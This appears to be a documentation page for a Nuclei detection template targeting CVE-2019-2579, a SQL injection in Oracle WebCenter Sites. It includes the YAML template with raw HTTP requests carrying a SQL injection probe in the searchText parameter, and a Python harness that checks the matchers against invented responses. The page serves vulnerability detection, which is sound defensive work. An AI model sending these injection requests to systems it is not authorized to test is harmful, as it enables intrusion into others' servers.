Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection
ID: CVE-2019-2579
Severity: medium
Author: leovalcante
Tags: cve,cve2019,oracle,wcs,sqli
Description
The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
YAML Source
id: CVE-2019-2579

info:
  name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection
  author: leovalcante
  severity: medium
  description: The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data manipulation, or denial of service.
  remediation: |
    Apply the necessary patches or updates provided by Oracle to mitigate the SQL Injection vulnerability.
  reference:
    - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
    - https://github.com/Leovalcante/wcs_scanner
    - https://nvd.nist.gov/vuln/detail/CVE-2019-2579
    - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2019-2579
    epss-score: 0.00493
    epss-percentile: 0.75701
    cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: oracle
    product: webcenter_sites
  tags: cve,cve2019,oracle,wcs,sqli

http:
  - raw:
      - |
        GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /cs/ContentServer HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "value='' and '1'='0 --"
          - "Use this utility to view and manage URLs"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: authkey
        group: 1
        regex:
          - "NAME='_authkey_' VALUE='([0-9A-Z]+)'>"
        internal: true
        part: body
# digest: 4a0a00473045022100901b1946e1d1ec22c5ff158dc051e3f1d33181bf6b4f54141b086733ca51ea6002206b5b19f0d1eb689e6d907575b5e271a9b9f693bf01e4a921edd4d05b87210741:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is run with the Nuclei scanner. Nuclei sends the two raw requests in order, fills {{authkey}} in the second request from the internal regex extractor applied to the first response, and reports a finding only when both matchers (the two reflected strings and the 200 status) succeed on the second response.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-2579.yaml"
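To understand what the template actually asserts, the following Python is an added example (not part of the template or the Nuclei project) that re-implements its extractor, its word and status matchers, and the {{...}} substitution, and runs them over constructed sample responses. The hostname and the response bodies are invented fixtures; the regex, the matcher words, and the raw POST body are taken verbatim from the template above. It shows two things the YAML alone does not make obvious: the second request cannot be built unless the first response carries the _authkey_ hidden field, and the word matcher keys on the search term being reflected unencoded, so a response that HTML-encodes the reflection (the second fixture) produces no match.

```python
import re
from typing import Optional, Tuple

# Extractor from the template: capture group 1 becomes the {{authkey}} variable.
AUTHKEY_RE = re.compile(r"NAME='_authkey_' VALUE='([0-9A-Z]+)'>")

# Word matcher from the template ("condition: and" -> every word must be present).
MATCH_WORDS = (
    "value='' and '1'='0 --",
    "Use this utility to view and manage URLs",
)

# Status matcher from the template.
MATCH_STATUS = (200,)

# Second raw request from the template, still carrying nuclei's {{...}} placeholders.
RAW_POST = (
    "POST /cs/ContentServer HTTP/1.1\r\n"
    "Host: {{Hostname}}\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences"
    "&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot"
    "&searchText=%27+and+%271%27%3D%270+--+"
)

PLACEHOLDER_RE = re.compile(r"\{\{(\w+)\}\}")


def extract_authkey(body: str) -> Optional[str]:
    """Mirror the template's regex extractor: return capture group 1, or None if absent."""
    m = AUTHKEY_RE.search(body)
    return m.group(1) if m else None


def render_raw(raw: str, **values: str) -> str:
    """Substitute {{name}} placeholders; names without a value are left as they are."""
    return PLACEHOLDER_RE.sub(lambda m: values.get(m.group(1), m.group(0)), raw)


def word_matcher(body: str, words=MATCH_WORDS, condition: str = "and") -> bool:
    """nuclei 'word' matcher: plain substring checks combined with and/or."""
    hits = [w in body for w in words]
    return all(hits) if condition == "and" else any(hits)


def status_matcher(status: int, allowed=MATCH_STATUS) -> bool:
    """nuclei 'status' matcher: the response code must be one of the listed codes."""
    return status in allowed


def template_matches(status: int, body: str) -> bool:
    """'matchers-condition: and' -> the word matcher and the status matcher must both pass."""
    return word_matcher(body) and status_matcher(status)


def run_template(step1: Tuple[int, str], step2: Tuple[int, str],
                 hostname: str = "wcs.example.invalid"):
    """Evaluate both steps against canned (status, body) responses.

    Returns (matched, rendered_second_request). If the first response yields no
    authkey this example treats the run as a non-match and builds no request
    (an assumption of this example, chosen to make the dependency explicit).
    """
    authkey = extract_authkey(step1[1])
    if authkey is None:
        return False, None
    rendered = render_raw(RAW_POST, Hostname=hostname, authkey=authkey)
    return template_matches(*step2), rendered


# Constructed sample responses; none of these were captured from a real system.
STEP1_OK = (200, "<form NAME='WebReferences'>"
                 "<INPUT TYPE='hidden' NAME='_authkey_' VALUE='A1B2C3D4E5F6'></form>")
STEP2_UNENCODED = (200, "<h2>Web References</h2>"
                        "<p>Use this utility to view and manage URLs</p>"
                        "<input name='searchText' value='' and '1'='0 --'>")
STEP2_ENCODED = (200, "<h2>Web References</h2>"
                      "<p>Use this utility to view and manage URLs</p>"
                      "<input name='searchText' value='&#39; and &#39;1&#39;=&#39;0 --'>")

if __name__ == "__main__":
    for label, step2 in (("unencoded reflection", STEP2_UNENCODED),
                         ("encoded reflection", STEP2_ENCODED)):
        matched, rendered = run_template(STEP1_OK, step2)
        print(f"{label}: matched={matched}")
    print("no authkey:", run_template((200, "<html></html>"), STEP2_UNENCODED))
```

Because the matcher is a pair of substring checks plus a status code, a negative result from this template only says that the two strings were not reflected together in a 200 response; confirming that the Oracle patch referenced above is installed is the reliable check.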